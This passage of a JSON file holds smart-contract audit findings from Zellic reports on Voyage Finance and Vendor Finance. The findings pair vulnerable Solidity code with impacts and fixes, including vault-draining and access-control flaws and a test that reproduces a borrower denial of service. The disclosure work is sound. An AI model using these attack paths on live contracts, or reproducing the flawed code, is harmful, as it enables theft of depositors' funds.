param.totalAssetFromJuniorTranche >) param.remaningDebt. Voyage will be in possession of assets equal to param.receivedAmount; furthermore, param.receivedAmount will be sent to the senior depositors: IERC20(param.currency).safeTransfer( reserveData.seniorDepositTokenAddress, param.receivedAmount ); The finding has been rated as critical because it could have catastrophic consequences for the performance of the protocol. 1. Junior depositors would be missing funds with potentially no explanation. This is likely to be realized by users over time and may result in near complete aban- donment of the junior tranche and hence loss of core protocol functionality and purpose. 2. It would raise the prospect of additional yet unfound issues that could end up affecting senior depositors. This could result in a complete loss of confidence in the project and team. Make the following code change in liquidate(...))): Zellic Voyage Finance } else { uint256 refundAmount = discountedFloorPriceInTotal - param.totalDebt; IERC20(param.currency).transfer(param.vault, refundAmount); param.receivedAmount -= refundAmount; param.remaningDebt = 0; } Voyage has since made considerable changes to the code base in order to funda- mentally alter the way funds are distributed in the event of liquidations. We view the changes to the code base as extending beyond remediation efforts targeting the basic coding mistake we have identified and as constituting extensions to the code base that would require extending the scope of the audit engagement. For context, there have been 81 commits made since the scoping of the audit and this remediation commit provided by Voyage 654a9242. Across these commits a total of 30 solidity files have been changed with a total of 1,406 insertions and 1008 deletions. Out of respect for the scope of the initial engagement we have not been able to fully audit these changes and confirm whether the underlying issue identified here has indeed been remediated. However, we can confirm that Voyage has acknowledged the issue and has claimed to have fixed it in these architectural changes. Zellic Voyage Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Voyage - Zellic Audit Report.pdf" + }, + { + "title": "3.6 Inconsistent usage of totalUnbonding leads to lost or under- utilized lender assets", + "labels": [ + "Zellic" + ], + "body": "Target: Vtoken.sol Category: Business Logic Likelihood: High Severity: Critical : Critical Functions in VToken assume the variable totalUnbonding keeps track of the total amount of underlying shares in the unbonding state. However, the rest of the Voyage protocol assumes these variables keep track of the amount of underlying asset in the unbond- ing state. For example, VToken::pushWithdraw(...) uses shares: function pushWithdraw(address _user, uint256 _shares) internal { unbondings[_user].shares += _shares; unbondings[_user].maxUnderlying += convertToAssets(_shares); totalUnbonding += _shares; } Whereas JuniorDepositToken:)totalAssets() assumes the variable expresses an amount of the underlying asset: contract JuniorDepositToken is VToken { function totalAssets() public view override returns (uint256) { return asset.balanceOf(address(this)) - totalUnbonding; } } This issue has far-reaching consequences, as it influences the amount of assets de- posited to both the senior and junior pools. Depending on the exchange rate used to convert between assets and shares, totalUnbonding could become greater or smaller than the correct value. For example, if convertToAssets(_shares) > _shares then totalUnbonding will be set to a lower-than-intended amount by pushWithdraw(...))). This means that Voyage will assume the pool has more assets available than it really does. So, for example, liquid- ity checks in buyNow(...))) will pass when they should not, and purchase orders can Zellic Voyage Finance mysteriously fail. Additionally, assets locked by lenders for withdraw will still be lent out. This can lead to calls to claim(...))) failing and lost assets for lenders. If convertToAssets(_shares) < _shares then totalUnbonding is instead set to a greater- than-intended value by pushWithdraw(...))). Voyage will therefore assume the pool has fewer assets than it really does. Depositor assets will become underutilized by borrowers, and depending on the magnitude of the difference, funds could become effectively locked. Moreover, since totalUnbonding factors into SeniorDepositToken:)totalAssets(...))) this can also have an impact on the general accuracy of deposit and withdraw cal- culations, as the conversion ratio between shares and assets depends on the value returned by totalAssets(...))). Consistently use totalUnbonding to express an amount of assets or an amount of shares. Assuming the variable is intended to keep track of an amount of assets, at least two modifications to the code would have to be made. One to VToken:)pushWithdraw(...))): function pushWithdraw(address _user, uint256 _shares) internal { unbondings[_user].shares += _shares; unbondings[_user].maxUnderlying += convertToAssets(_shares); totalUnbonding += _shares; totalUnbonding += convertToAssets(_shares); } And another to VToken:)claim(): function claim() external { /) [...))] if (availableLiquidity > maxClaimable) { /) [...))] } else { /) [...))] } totalUnbonding -= transferredShares; totalUnbonding -= convertToAssets(transferredShares); Zellic Voyage Finance asset.safeTransfer(msg.sender, transferredAsset); } Commits 3320ba3c and acbe5001 were indicated as containing remediations for this issue. Reviewing the remediation for this issue has proven to be challenging due to the pace of the development. A total of 29 commits exist between the commit under review and 3320ba3c; the diff between the two commits amounts to 24 solidity files changed, with 324 insertions and 525 deletions. Another 86 commits exist between 3320ba3c and acbe5001, with a diff amounting to 29 solidity files changed, 1279 insertions, and 969 deletions. The two commits appear to correctly fix the issue; we largely based this evaluation on the description of the applied changes provided by the Voyage team due to the con- siderable amount of changes, which seems compatible with what can be observed in the commits. The totalUnbonding function is not used anymore in the computa- tion of totalAssets; two other functions, totalUnbondingAsset and unbonding, were introduced, respectively computing the amount of assets and shares that are in the unbonding state. Zellic Voyage Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Voyage - Zellic Audit Report.pdf" + }, + { + "title": "3.7 Share burn timing in Vtoken can lead to complete loss of funds", + "labels": [ + "Zellic" + ], + "body": "Target: Vtoken.sol Category: Business Logic Likelihood: High Severity: Critical : Critical In general, the ERC4626 vault uses the current ratio of total shares to total assets for pricing conversion from assets to shares for deposits and conversions from shares to assets for withdrawals. The VToken vault in Voyage implements a novel two-step withdrawal process. Users first call withdraw(\u2026), which calls pushWithdraw(\u2026), to record the number of shares being withdrawn and the corresponding value in asset terms and to reserve the total amount of assets being withdrawn by updating totalUnbonding. In the cur- rent implementation, burn(\u2026) occurs before this call is made: shares = previewWithdraw(_amount); /) No need to check for rounding error, previewWithdraw rounds up. if (msg.sender != _owner) { _spendAllowance(_owner, msg.sender, shares); } beforeWithdraw(_amount, shares); _burn(_owner, shares); pushWithdraw(_owner, shares); This inadvertently alters the total shares and hence the conversion from shares to assets that occurs in pushWithdraw(\u2026): function pushWithdraw(address _user, uint256 _shares) internal { unbondings[_user].shares += _shares; unbondings[_user].maxUnderlying += convertToAssets(_shares); totalUnbonding += _shares; } Users then call claim(\u2026) in order to receive their funds. For the case where available Liquidity > maxClaimable, the incorrect conversion from the previous step will carry over. Furthermore, if availableLiquidity <) maxClaimable, another conversion will Zellic Voyage Finance also be based on an incorrect total shares: if (availableLiquidity > maxClaimable) { transferredAsset = maxClaimable; transferredShares = unbondings[msg.sender].shares; resetUnbondingPosition(msg.sender); } else { transferredAsset = availableLiquidity; uint256 shares = convertToShares(availableLiquidity); reduceUnbondingPosition(shares, transferredAsset); transferredShares = shares; } Calling deposit(...))) and withdraw(...))) in the same transaction repeatedly can lead to draining of the tranches. For example, in general, let deposit of assets of amount equal to assetDeposited result in an amount of shares equal to sharesReceived being sent to the depositor. It is expected behavior (and has been verified) that an immediate call (same transac- tion) to withdraw(...))) made with assetDeposited will set the amount of shares to be burned as sharesReceived: function withdraw( uint256 _amount, address _receiver, address _owner ) public override(ERC4626, IERC4626) returns (uint256 shares) { shares = previewWithdraw(_amount); /) No need to check for rounding error, previewWithdraw rounds up. beforeWithdraw(_amount, shares); _burn(_owner, shares); pushWithdraw(_owner, shares); emit Withdraw(msg.sender, _receiver, _owner, _amount, shares); The call to _burn(...))) in withdraw(...))) reduces the totalSupply of shares by shares Received so that the call to pushWithdraw(...))) overprices the asset when calculating Zellic Voyage Finance the amount of asset owed to the depositor in unbondings[_user].maxUnderlying += c onvertToAssets(_shares) and also reserves the assets for withdraw in totalUnbonding += convertToAssets(_shares): function pushWithdraw(address _user, uint256 _shares) internal { unbondings[_user].shares += _shares; unbondings[_user].maxUnderlying += convertToAssets(_shares); totalUnbonding += convertToAssets(_shares); } The call to convertToAssets(_shares) necessarily overprices the asset. We have fully proven this mathematically, but there is a sufficiently strong intuitive argument. The price of shares in units of assets is based on the ratio of the balance of assets to shares. From the base implementation of ERC4626 we have function convertToAssets(uint256 shares) public view virtual returns (uint256) { } uint256 supply = totalSupply(); /) Saves an extra SLOAD if totalSupply is non-zero. return supply == 0 ? shares : shares.mulDivDown(totalAssets(), supply ); Therefore, if the supply is reduced by a premature _burn(...))), we necessarily over- inflate the amount of assets the depositor can withdraw. This allows an attacker to drain the funds from the vaults through repeated atomic deposit(...))) + withdraw(. .)) transactions. Move share burning until the end of claim(...))) as suggested below: if (availableLiquidity > maxClaimable) { transferredAsset = maxClaimable; transferredShares = unbondings[msg.sender].shares; Zellic Voyage Finance resetUnbondingPosition(msg.sender); } else { transferredAsset = availableLiquidity; uint256 shares = convertToShares(availableLiquidity); reduceUnbondingPosition(shares, transferredAsset); transferredShares = shares; } totalUnbonding -= transferredAsset; asset.safeTransfer(msg.sender, transferredAsset); _burn(_owner, transferredShares); } This positioning should also avoid conflicts with other processes in Voyage. Voyage has moved the call to _burn so that it occurs after the reduction in the unb onding position in claim in commit 63099db1. This aligns the implementation with the intended design and avoids overvaluing the assets in the preview and conversion functions. Zellic Voyage Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Voyage - Zellic Audit Report.pdf" + }, + { + "title": "3.8 Buyers make first interest payment twice", + "labels": [ + "Zellic" + ], + "body": "Target: LoanFacet.sol Category: Business Logic Likelihood: High Severity: High : High Callers of buyNow(...))) will always pay the first interest payment twice. The first time happens when they pay the down payment\u2014they can pay it in either ETH or WETH. The down payment is equal to params.downpayment = params.pmt.pmt where pmt is given by function calculatePMT(Loan storage loan) internal view returns (PMT memory) PMT memory pmt; pmt.principal = loan.principal / loan.nper; pmt.interest = loan.interest / loan.nper; pmt.pmt = pmt.principal + pmt.interest; return pmt; { } The second time happens when distributeInterest(...))) is called: LibLoan.distributeInterest( reserveData, params.pmt.interest, _msgSender() ); This pulls the same amount, but only WETH, directly from the buyer. Zellic Voyage Finance Users will be discouraged from using the protocol due to the extra large payment arising from high interest rates. Remove the interest component from the down payment. Commit 3320ba3c was indicated as containing the remediation for this issue. The pa rams.downpayment variable is now set to params.pmt.principal instead of params.pmt. pmt, meaning it will contain the value corresponding to the principal (without interest) of a single installment. We note that a total of 29 commits exist between the commit under review and 3320ba3c; the diff between the two commits amounts to 24 solidity files changed, with 324 insertions and 525 deletions, containing other potentially relevant changes. Zellic Voyage Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Voyage - Zellic Audit Report.pdf" + }, + { + "title": "3.9 Missing stale price oracle check results in outsized NFT price risk", + "labels": [ + "Zellic" + ], + "body": "Target: LoanFacet.sol Category: Business Logic Likelihood: Medium Severity: High : High The price oracle stores the average price of NFTs in a given collection. Calls to update TWAP(...))) set the average price and the block.timestamp: function updateTwap(address _currency, uint256 _priceAverage) external auth { } prices[_currency].priceAverage = _priceAverage; prices[_currency].blockTimestamp = block.timestamp; The timestamp is returned from calls to getTWAP(...))): function getTwap(address _currency) external view returns (uint256, uint256) { } return ( prices[_currency].priceAverage, prices[_currency].blockTimestamp ); Unfortunately, the time stamp is never used in buyNow(...))). Since the protocol expects only NFTs satisfying the following two conditions to be purchased, if (params.fv == 0) { revert InvalidFloorPrice(); Zellic Voyage Finance } if (params.fv < params.totalPrincipal) { revert InvalidPrincipal(); } an out-of-date price oracle means these conditions could be violated. Furthermore, there are no stale price checks in liquidate(\u2026): IPriceOracle priceOracle = IPriceOracle( reserveData.priceOracle.implementation() ); (param.floorPrice, param.floorPriceTime) = priceOracle.getTwap( param.collection ); if (param.floorPrice == 0) { revert InvalidFloorPrice(); } [...))] param.totalDebt = param.principal; param.remaningDebt = param.totalDebt; param.discount = getDiscount(param.floorPrice, param.liquidationBonus); param.discountedFloorPrice = param.floorPrice - param.discount; uint256 discountedFloorPriceInTotal = param.discountedFloorPrice * collaterals.length; IERC20(param.currency).safeTransferFrom( param.liquidator, address(this), discountedFloorPriceInTotal ); If an NFT was purchased with a price greater than the average price (i.e., params.fv < params.totalPrincipal), then lenders may end up backing much riskier assets than intended. Additionally, if stale prices are below current prices a liquidator would be able to purchase the NFTs at a discount and sell them for a profit. On the other hand, if stale prices were above market prices, NFTs could stay locked in the system. Zellic Voyage Finance The utility of credit products for users depends immensely on good alignment be- tween the underlying credit dynamics and user expectations. This logic error can result in a rate of loan defaults that is largely outsized to investor expectations. Additionally, upon liquidation it can also result in vault loss of funds through selling NFTs at submarket prices. Introduce stale price checks in buyNow(...))) and liquidate(.)). The protocol opera- tors need to determine the appropriate length of the time window to be accepted for the last average price. Because these are NFT markets, it is important to ensure the window is long enough so that it reflects a sufficient number of trades while at the same time not including out-of-date trades. Voyage has introduced stale price checks in both buyNow(...))) and liquidate(...))) in the following commits 80a681a2 and 654a9242. Zellic Voyage Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Voyage - Zellic Audit Report.pdf" + }, + { + "title": "3.10 Calls to Redeem(...))) can result in lost depositor funds", + "labels": [ + "Zellic" + ], + "body": "Target: VToken.sol Category: Business Logic Likelihood: Medium Severity: High : Medium We would like to credit Voyage for finding the following critical exploit while the audit was ongoing and in its early stages. Calls to the base ERC4626 redeem(...))) can be made by anyone. Unfortunately, rede em(...))) does not implement any of the pushWithdraw(...))): function pushWithdraw(address _user, uint256 _shares) internal { unbondings[_user].shares += _shares; unbondings[_user].maxUnderlying += convertToAssets(_shares); totalUnbonding += convertToAssets(_shares); } Any calls to claim after calling redeem(...))) would result in no funds be transferred to the user. We suggest modifying redeem(...))) to accordingly incorporate the pushWithdraw(...))) functionality. Commit 2ebf6278 was indicated as containing the remediation. The issue appears to be correctly fixed in the given commit, having redeem implement the correct logic including a call to pushWithdraw. We note that the actual remediation was performed in 3320ba3c and that 2ebf6278 actually performs a minor refactoring on the lines responsible for the fix. Zellic Voyage Finance 3.11 Incorrect calculation in refundGas Target: Vault.sol Category: Business Logic Likelihood: High Severity: Medium : Medium The Vault:)refundGas function performs an incorrect calculation of the amountRefunda ble variable if the WETH amount to unwrap is greater than the available balance. The code is reported below for convenience: function refundGas(uint256 _amount, address _dst) external onlyPaymaster { uint256 amountRefundable = _amount; uint256 ethBal = address(this).balance; /) we need to unwrap some WETH in this case. if (ethBal < _amount) { IWETH9 weth9 = IWETH9(LibVaultStorage.ds().weth); uint256 balanceWETH9 = weth9.balanceOf(address(this)); uint256 toUnwrap = _amount - ethBal; /) this should not happen, but if it does, we should take what we can instead of reverting if (toUnwrap > balanceWETH9) { weth9.withdraw(balanceWETH9); amountRefundable = amountRefundable - toUnwrap - balanceWETH9 ; } } else { weth9.withdraw(toUnwrap); } /) [code continues...))] Consider the following numerical example: _amount is 100 ethBal is 60 balanceWETH9 is 30 toUnwrap will be calculated as 100 - 60 = 40 amountRefundable will be calculated as 100 - 40 - 30 = 30, instead of the ex- pected 90 Zellic Voyage Finance The function will refund to the treasury less than the expected amount. Fix the calculation by applying parentheses around toUnwrap - balanceWETH9 on the line calculating amountRefundable. Voyage has followed the recommendation and corrected the calculation in commit 6e44df5f. Zellic Voyage Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Voyage - Zellic Audit Report.pdf" + }, + { + "title": "3.12 Missing access control on postRelayedCall leading to ETH transfer from Vault", + "labels": [ + "Zellic" + ], + "body": "Target: VoyagePaymaster.sol Category: Business Logic Likelihood: High Severity: High : Medium The VoyagePaymaster:)postRelayedCall function is lacking any access control check. The function invokes refundGas on a vault supplied by the caller to refund a caller controlled amount of ETH to the treasury address. function postRelayedCall( bytes calldata context, bool success, uint256 gasUseWithoutPost, GsnTypes.RelayData calldata relayData ) external virtual override { address vault = abi.decode(context, (address)); /) calldata overhead = 21k + non_zero_bytes * 16 + zero_bytes * 4 /) ~) 21k + calldata.length * [1/3 * 16 + 2/3 * 4] uint256 minimumFees = (gasUseWithoutPost + 21000 + msg.data.length * 8 + REFUND_GAS_OVERHEAD) * relayData.gasPrice; uint256 refund = vault.balance >= minimumFees ? minimumFees : minimumFees + 21000 * relayData.gasPrice; /) cover cost of unwrapping WETH IVault(vault).refundGas(refund, treasury); } A malicious user can invoke postRelayedCall to transfer ETH from any vault to the treasury address. Zellic Voyage Finance Apply strict access control to the function. Commit 791b7e63 was indicated as containing the remediation. The commit correctly fixes the issue by enforcing access control to postRelayedCall. Zellic Voyage Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Voyage - Zellic Audit Report.pdf" + }, + { + "title": "3.13 Functions cannot be removed during upgrades", + "labels": [ + "Zellic" + ], + "body": "Target: DiamondVersionFacet.sol Category: Business Logic Likelihood: Medium Severity: Medium : Medium In getUpgrade(...))), bytes4[] storage existingSelectors = LibAppStorage .ds() .upgradeParam .existingSelectors[msg.sender]; it is populated with null values. Therefore, the following loop to set the remove functions will never initiate: for (uint256 i = 0; i < existingSelectors.length; ) { if (!newSelectorSet[existingSelectors[i]]) { LibAppStorage.ds().upgradeParam.selectorsRemoved[i].push( existingSelectors[i] ); } And the final IDiamondCut.FacetCut[] returned will not contain any of the remove in- structions. It will not be possible to remove functions from Voyage\u2019s interface using the intended functionality. It would be possible, however, to replace them with functions that do not perform any operations. This approach will, however, result in a very cluttered and confusing interface and should be avoided. Populate existingSelectors by populating adding existingSelectors.push(selector) to the following: Zellic Voyage Finance for (uint256 i = 0; i < currentFacets.length; ) { IDiamondLoupe.Facet memory facet = currentFacets[i]; for (uint256 j = 0; j < facet.functionSelectors.length; ) { bytes4 selector = facet.functionSelectors[j]; newSelectors.push(selector); existingSelectorFacetMap[selector] = facet.facetAddress; existingSelectors.push(selector); unchecked { ++j; } } unchecked { ++i; } } The upgrade functionality has been dropped entirely from the project, the issue has therefore been remediated. Zellic Voyage Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Voyage - Zellic Audit Report.pdf" + }, + { + "title": "3.14 Missing access control on multiple PaymentsFacet functions", + "labels": [ + "Zellic" + ], + "body": "Target: PaymentsFacet.sol Category: Business Logic Likelihood: High Severity: High : Low Multiple functions in PaymentsFacet are lacking any access control checks: unwrapWETH9 unwraps and sends WETH owned by Voyage to an arbitrary ad- dress wrapWETH9 wraps all the ETH balance owned by Voyage into WETH sweepToken transfers any ERC20 token owned by Voyage to an arbitrary address refundETH transfers all the ETH balance owned by Voyage to msg.sender Those functions can be used to steal or transfer ETH and ERC20 assets held by the main Voyage contract. The contract only holds assets temporarily while process- ing transactions (e.g., buyNow), so an attacker cannot generally gain anything by using them. However, since there is no reentrancy guard, there is a risk of an attacker finding a way to reenter the contract while the contract is holding some assets. Since these functions are not meant to be publicly exposed, they represent an un- necessary risk. We recommend to enforce access control to restrict usage only to the intended user. Commit 9a2e8f42 was indicated as containing the remediation. The issue is correctly fixed in the given commit. The four functions have been marked as internal. Zellic Voyage Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Voyage - Zellic Audit Report.pdf" + }, + { + "title": "3.15 Multicall can be used to call buyNow with untrusted msg.va lue", + "labels": [ + "Zellic" + ], + "body": "Target: Multicall.sol, LoanFacet.sol Category: Coding Mistakes Likelihood: High Severity: High : Low The main Voyage contract also exposes the methods of the Multicall contract via this chain: Voyage is an instance of Diamond (by inheritance) Diamond allows to delegatecall any registered facet \u2013 One of the facets is PaymentsFacet PaymentsFacet is multicall by inheritance \u2013 Multicall has a multicall method that performs an arbitrary amount of delegatecalls to address(this), with arbitrary calldata Any function called by multicall must not trust msg.value, since Multicall allows to perform multiple calls in the same transaction, preserving the same msg.value. A function trusting msg.value might assume that the contract has received msg.value ETH from the caller and can spend it exclusively, which is not true in case the function is called multiple times in the same transaction by leveraging multicall. Multicall allows to call any method exposed by any Voyage facet, including LoanFacet: :buyNow, which assumes that msg.value ETH were sent by the caller as down payment for the requested NFT. The buyNow function assumes the caller has sent msg.value ETH as down payment for the NFT. Luckily, an attacker cannot exploit this flawed assumption and use funds from the protocol pools to buy NFTs at a reduced price, as the contract will not have enough ETH to buy the NFT, causing a revert. Adopt an explicit allowlist to limit which functions can be invoked by Multicall and ensure msg.value is not used by any of these functions. The buyNow function is the only one using msg.value in the commit under review. Zellic Voyage Finance Multicalls and self permit have been removed from the code base entirely, the issue has therefore been remediated. Zellic Voyage Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Voyage - Zellic Audit Report.pdf" + }, + { + "title": "3.16 The maxWithdraw functionality is broken", + "labels": [ + "Zellic" + ], + "body": "Target: LiquidityFacet.sol Category: Business Logic Likelihood: High Severity: Low : Low Depositors will be unable to use the intended maxWithdraw functionality in withdra w(...))): uint256 userBalance = vToken.maxWithdraw(msg.sender); uint256 amountToWithdraw = _amount; if (_amount == type(uint256).max) { amountToWithdraw = userBalance; } BorrowState storage borrowState = LibAppStorage.ds()._borrowState[ _collection ][reserve.currency]; uint256 totalDebt = borrowState.totalDebt + borrowState.totalInterest; uint256 avgBorrowRate = borrowState.avgBorrowRate; IVToken(vToken).withdraw(_amount, msg.sender, msg.sender); Users will need to make withdraw requests for exact amounts in order to retrieve all of their deposited funds. If the _amount provided in the function call exceeds the available balance, the function will fail with no clear error message. This can create a frustrating and unexpected user experience. Change IVToken(vToken).withdraw(_amount, msg.sender, msg.sender); to IVToken(vToken).withdraw(amountToWithdraw, msg.sender, msg.sender); Zellic Voyage Finance Also, modify the _amount check to the following: if (_amount == type(uint256).max || _amount > userBalance) { amountToWithdraw = userBalance; } Commits aac23ae9 and 0e00c990 were indicated as containing the remediation. The commits correctly fix the issue by applying the suggested remediations. Zellic Voyage Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Voyage - Zellic Audit Report.pdf" + }, + { + "title": "3.17 Calls to previewBuyNow(...))) do not return correct order previews", + "labels": [ + "Zellic" + ], + "body": "Target: LoanFacet.sol Category: Business Logic Likelihood: High Severity: Low : Low The implemented functionality to preview NFT orders is incomplete. For example, the call below does not pass the _data and _tokenIds, which are required to determine the totalPrincipal. As it currently stands, even the most critical fields like totalPrincipal are not populated: function previewBuyNowParams(address _collection) public view returns (ExecuteBuyNowParams memory) { ExecuteBuyNowParams memory params; ReserveData memory reserveData = LibLiquidity.getReserveData( _collection ); ReserveConfigurationMap memory reserveConf = LibReserveConfiguration .getConfiguration(_collection); (params.epoch, params.term) = reserveConf.getBorrowParams(); params.nper = params.term / params.epoch; params.outstandingPrincipal = params.totalPrincipal - params.totalPrincipal / params.nper; There is a high probability that users would rely on the intended functionality of prev iewBuyNow(...))) to improve their user experience. Currently, the operation is non-functional and users would not be able to preview orders. Zellic Voyage Finance This could discourage user engagement. We suggest fully specifying the desired functionality in previewBuyNow(...))) and then updating the function accordingly. For example, parameters like _data and _tokenId should be passed to return the purchase price of the NFT and the average trading price of the NFTs in the collection. This would further allow fields like params.totalPrincip al to be populated and hence result in correct interest rate calculations. Voyage has refactored the function to populate a new struct PreviewBuyNowParams in commit f3db2541. It has been verified that the struct has been populated in the fol- lowing commits 2f4da9c9 and e1892115. Zellic Voyage Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Voyage - Zellic Audit Report.pdf" + }, + { + "title": "3.18 Public approve function allows to give approval for any ERC20 tokens held by Voyage", + "labels": [ + "Zellic" + ], + "body": "Target: PeripheryPayments.sol Category: Coding Mistakes Likelihood: High Severity: Low : Low The PeripheryPayments:)approve function does not perform any access control and can be used to invoke approve on any token on behalf of the Voyage contract. function approve( IERC20 token, address to, uint256 amount ) public payable { token.safeApprove(to, amount); } Furthermore, we have two additional observations about this function: It is unnecessarily marked as payable. It allows to call approve on any contract, not just ERC20; since ERC721 tokens also have a compatible approve function, PeripheryPayments:)approve could be used to invoke approve on ERC721 contracts as well. At the time of this review, the Voyage contract does not hold any ERC721 assets, so this specific issue has no impact yet. An attacker can use this function to invoke approve on any contract on behalf of Voy- age, with arbitrary arguments. This can be exploited to gain approval for any ERC20 or ERC721 token owned by Voyage. At the time of this review, the main Voyage contract only temporarily holds assets (e.g., while processing buyNow), so this could only be ex- ploited if an external call to a malicious contract was to be performed while Voyage is in possession of an asset. While this issue might not be exploitable in the code as reviewed, we strongly rec- ommend against exposing this function, as approval for a token has a persistent effect that might become relevant with a future code update. Zellic Voyage Finance Apply strict access control to this function, allowing only calls from address(this). Commit 9a2e8f42 was indicated as containing the remediation. The commit correctly fixes the issue by moving the approve function a new LibPayments library as an internal function. The subsequent commit 9a2e8f42 removes the PeripheryPayments.sol file entirely, leaving only the library version of the function. Zellic Voyage Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Voyage - Zellic Audit Report.pdf" + }, + { + "title": "3.19 Junior tranche receives interest with zero risk exposure", + "labels": [ + "Zellic" + ], + "body": "Target: LibLoan.sol Category: Business Logic Likelihood: Low Severity: Low : Low There are no checks to confirm non-zero risk exposure of the junior tranche during the distribution of interest. Interest is sent to the junior tranche even if there are no assets deposited. The interest is not entirely lost and can be recovered through calls to transferUnderlyingTo(...))) made by the admin. We would like to further note that the distribution of IR payments between junior and senior tranches is fixed and not a risk-weighted exposure of the tranches. This creates a dynamic where the JR tranche may only contain $1 backing a $1MM NFT and still receive a fixed share of the interest. Such an opportunity would attract other investors. In theory, they would support the junior tranche until an equilibrium level is found that reflects the market appetite for IR returns and the credit profile of the protocol. We would like Voyage to please confirm this is the dynamic they seek. In order for this dynamic to be realized, the following recommendation should be observed. Add a check to ensure that the junior tranche has non-zero exposure to assets paying interest in distributeInterest(...))). Voyage has included checks to ensure that the balance of the jr tranche exceeds an optimal liquidity ratio in calls to buyNow in commit 76f21d00. Zellic Voyage Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Voyage - Zellic Audit Report.pdf" + }, + { + "title": "3.20 Missing validation check on ERC20 transfer", + "labels": [ + "Zellic" + ], + "body": "Target: loanFacet.sol Category: Business Logic Likelihood: N/A Severity: Low : Informational Currently liquidate(...))) does not revert the transaction if the following ERC20 tran sfer fails: if (param.totalDebt > discountedFloorPriceInTotal) { param.remaningDebt = param.totalDebt - discountedFloorPriceInTotal; } else { uint256 refundAmount = discountedFloorPriceInTotal - param.totalDebt; IERC20(param.currency).transfer(param.vault, refundAmount); param.receivedAmount -= refundAmount; } The call should never fail as the funds will always be in the account. Add a check and revert on a false return value from the ERC20 transfer call. Commit 654a9242 was indicated as containing the remediation. The commit correctly fixes the issue by using safeTransfer instead of transfer, which does revert if the transfer fails. Zellic Voyage Finance 3.21 Lack of reentrancy guards Target: Voyage Category: Coding Mistakes Likelihood: N/A Severity: Medium : Informational Most of the public and external functions lack reentrancy guards. Applying a guard to all functions that are not intended to be reentrant greatly simplifies reasoning about the actions that a malicious contract could perform on Voyage and reduces the attack surface. The lack of reentrancy guards increases the attack surface reachable by any malicious contract that could be invoked by Voyage. We recommend applying guards to all functions that are not designed to be reentrant. We note that the diamond pattern adopted by Voyage might require a custom imple- mentation of reentrancy guards, in order to use the shared diamond storage contract to store the flag tracking the contract state. We further note that the diamond pattern requires allowing direct self-reentrancy, slightly limiting how restrictive a reentrancy guard could be. Voyage has indicated they have applied reentrancy gaurds to the majority of external functions. They have further clarified that they beleive that all external functions which do not have reentrancy gaurds are not vulnerable. Zellic Voyage Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Voyage - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Denial of service on behalf of borrower", + "labels": [ + "Zellic" + ], + "body": "Target: LendingPool, PositionTracker Category: Coding Mistakes Likelihood: High Severity: High : High In LendingPool, the function borrowOnBehalfOf() enables a user to deposit collateral to the lending pool and sends the borrowed tokens to another user. Any user can do this, and any user can also pay back the loan on behalf of another user. The result is that a borrow position is opened in the PositionTracker contract on behalf of the borrower when a loan is taken, and this position is supposed to be closed when the loan and fees are paid back. When an attacker borrows zero tokens on behalf of a victim user, a borrow position is created for the victim user with debt equal to zero. Attempting to repay a loan when there is no debt will result in a reverting NoDebt() error. A similar situation can arise if a very small loan is taken on behalf of a victim user, but then they at least get some tokens for it, and they are able to unlock their account by paying it back with some fees. The borrow position becomes impossible to close, and the victim cannot borrow any- thing from that pool instance forever. A test case that reproduces the scenario has been implemented within the existing test framework. This test should not pass after remediation. it(\"[Bug1] - DoS on behalf of user\", async function () { await usdc.mint(pool.address, USDC_1000); await weth.mint(userA.address, WETH_5); await weth.connect(userA).approve(pool.address, WETH_5); let feeRate = await feesManager.getCurrentRate(pool.address); await pool.connect(userA).borrowOnBehalfOf(userB.address, 0, feeRate); await expect( pool.connect(userA).repayOnBehalfOf(userB.address, 0) Zellic Vendor Finance ).to.be.revertedWithCustomError(LendingPoolImplementation, \"NoDebt\"); await expect( pool.connect(userA).borrowOnBehalfOf(userB.address, WETH_5, feeRate) ).to.be.revertedWithCustomError(positionTracker, \"PositionIsAlreadyOpen\"); expect((await pool.debts(userB.address)).debt).to.equal(0); }); To prevent errors and potential abuse, we recommend disallowing loans of zero to- kens. Users may accidentally input zero-valued parameters or attempt to exploit the system by depositing an insignificant amount and blocking a victim\u2019s account un- til they pay it back with interest. To address this, consider setting a minimum loan amount that users must borrow or adding other safeguards to ensure the integrity of the lending system. Vendor Finance acknowledged this finding and implemented a fix in commit c5331198. Zellic Vendor Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Vendor Finance - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Hardcoded expiry and protocolFee", + "labels": [ + "Zellic" + ], + "body": "Target: LendingPool, FeesManager Category: Coding Mistakes Likelihood: Low Severity: Informational : Low The LendingPool.setPoolRates() is a wrapper function for FeesManager.setPoolRates( ) that sends expiry and protocolFee to the FeesManager contract by passing the global poolSettings struct. This makes the parameters uncontrollable by the pool owner, but the values are not verified in any meaningful way in the receiver (FeesManager). A risk is that an upgrade to LendingPool changes or forgets this calling convention, which makes FeesManager\u2019s expiry or protocolFee go out of sync with the LendingPool exp iry time. function setPoolRates(bytes32 _ratesAndType) external { onlyOwner(); onlyNotPaused(); feesManager.setPoolRates(address(this), _ratesAndType, poolSettings.expiry, poolSettings.protocolFee); } The scenario is highly unlikely to happen in practice, as this is a central part of the contract functionality, and we expect it will be tested. So while it would be impactful if it happens, the impact has been adjusted to Low to reflect its unlikeliness. If the expiry suddenly changes to an invalid value (e.g., in the past or distant future), the calculation FeesManager.getCurrentRate(pool) will misbehave. This can lead to the rate suddenly becoming 0 or the wrong decay being calculated, or it can have no discernable effect. function getCurrentRate(address _pool) external view returns (uint48) { RateData memory rateData = poolFeesData[_pool]; if (rateData.rateType =) FeeType.NOT_SET) revert NotAPool(); if (block.timestamp > 2*)48 - 1) revert InvalidExpiry(); /) Per auditors suggestion 